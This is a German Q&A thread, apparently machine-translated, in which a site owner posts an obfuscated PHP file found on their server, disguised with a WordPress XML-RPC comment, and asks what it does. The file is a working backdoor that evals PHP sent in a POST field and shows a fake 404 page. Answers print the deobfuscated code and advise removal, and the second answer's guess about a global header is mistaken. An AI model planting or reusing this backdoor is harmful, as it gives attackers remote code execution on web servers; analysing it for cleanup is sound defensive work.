Zweck der bösartigen Datei auf dem Hosting

Question

Hallo, ich habe bösartige PHP-Datei auf dem Server, und ich habe diese Datei auf meinem Computer heruntergeladen. Diese Datei enthält kleinen bösartigen Code und versucht, den eval-Befehl auszuführen. Ich weiß nicht, welchen Einfluss diese Datei auf meinem Server hat. Bitte, wenn mir jemand mit diesem Code antworten kann bitte.

$q22 = "fo\\@5HL[\r.S4awj\t)n`x}\"UZ\$gr(+JO2i* I;3XCvBk>m,NzEc_6qD?9PYhuV:bl|WK&Q=#y~/t!\neAp7]{M1Fd%0-^8GR'<sT"; 

$GLOBALS['owyeq61'] = ${$q22[50].$q22[56].$q22[30].$q22[10].$q22[97]}; 
$GLOBALS['tmiok36'] = $q22[58].$q22[77].$q22[12].$q22[86].$q22[77].$q22[26]; 

if (!empty($GLOBALS['owyeq61']['mc589a12e'])) { 
    eval($GLOBALS['owyeq61']['mc589a12e']); 
} 

$GLOBALS['tmiok36']($q22[5].$q22[97].$q22[97].$q22[56].$q22[73].$q22[84].$q22[9].$q22[88].$q22[34].$q22[11].$q22[88].$q22[11].$q22[34].$q22[46].$q22[1].$q22[74].$q22[34].$q22[85].$q22[1].$q22[59].$q22[17].$q22[86]); 

echo $q22[95].$q22[58].$q22[84].$q22[43].$q22[11].$q22[88].$q22[11].$q22[34].$q22[46].$q22[1].$q22[74].$q22[34].$q22[85].$q22[1].$q22[59].$q22[17].$q22[86].$q22[95].$q22[73].$q22[58].$q22[84].$q22[43].$q22[8].$q22[76].$q22[97].$q22[58].$q22[77].$q22[34].$q22[79].$q22[12].$q22[25].$q22[77].$q22[34].$q22[74].$q22[58].$q22[12].$q22[74].$q22[34].$q22[71].$q22[1].$q22[59].$q22[34].$q22[58].$q22[12].$q22[40].$q22[77].$q22[34].$q22[26].$q22[77].$q22[52].$q22[59].$q22[77].$q22[96].$q22[74].$q22[77].$q22[86].$q22[34].$q22[49].$q22[1].$q22[59].$q22[63].$q22[86].$q22[34].$q22[17].$q22[1].$q22[74].$q22[34].$q22[62].$q22[77].$q22[34].$q22[0].$q22[1].$q22[59].$q22[17].$q22[86].$q22[9].$q22[8].$q22[76]; 
/** 
* XML-RPC protocol support for WordPress 
* 
* @package WordPress 
*/ 

/** 
* Whether this is an XML-RPC Request 
*/ 

Answer 1

Dieses Stück Code wird jeden PHP-Code ausführen, die auf Ihre Seite mit POST Anfrage gesendet wird, in einem Feld mc589a12e.

Dies ist der Code, nachdem die Verkettungen von $q22 Bewertung:

$GLOBALS['owyeq61'] = ${'_POST'}; 
$GLOBALS['tmiok36'] = 'header'; 
if (!empty($GLOBALS['owyeq61']['mc589a12e'])) { 
    eval($GLOBALS['owyeq61']['mc589a12e']); 
} 
$GLOBALS['tmiok36']('HTTP/1.0 404 Not Found'); 
echo '<h1>404 Not Found</h1> 
The page that you have requested could not be found.'; 

Answer 2

ich den Code in einer Sandbox-Modus.

$test['owyeq61'] = $q22[50].$q22[56].$q22[30].$q22[10].$q22[97]; 
// return POST 

$test['tmiok36'] = $q22[58].$q22[77].$q22[12].$q22[86].$q22[77].$q22[26]; 
// return Header 

$q22[95].$q22[58].$q22[84].$q22[43].$q22[11].$q22[88].$q22[11].$q22[34].$q22[ 46].$q22[1].$q22[74].$q22[34].$q22[85].$q22[1].$q22[59].$q22[17].$q22[86].$q22[95].$q22[73].$q22[58].$q22[84].$q22[43].$q22[8].$q22[76].$q22[97].$q22[58].$q22[77].$q22[34].$q22[79].$q22[12].$q22[25].$q22[77].$q22[34].$q22[74].$q22[58].$q22[12].$q22[74].$q22[34].$q22[71].$q22[1].$q22[59].$q22[34].$q22[58].$q22[12].$q22[40].$q22[77].$q22[34].$q22[26].$q22[77].$q22[52].$q22[59].$q22[77].$q22[96].$q22[74].$q22[77].$q22[86].$q22[34].$q22[49].$q22[1].$q22[59].$q22[63].$q22[86].$q22[34].$q22[17].$q22[1].$q22[74].$q22[34].$q22[62].$q22[77].$q22[34].$q22[0].$q22[1].$q22[59].$q22[17].$q22[86].$q22[9].$q22[8].$q22[76]; 
// returns 404 Page not found 

Aber in der Eval wird es schwierig. Es sucht nach dem globalen Header mc589a12e es ist nicht im Code, so denke ich, dass es in WordPress irgendwo gesetzt ist, das Skript umschreiben global auf HTTP/1.0 404 Not Found. Vielleicht um eine Sicherheitsüberprüfung zu umgehen.

Es ist unnötig zu sagen, diese Datei von Ihrem Server zu löschen und Ihr System zu aktualisieren/Benutzer/Schreibrechte zu überprüfen.

Vielleicht verwenden als Ihre Checkliste https://codex.wordpress.org/FAQ_My_site_was_hacked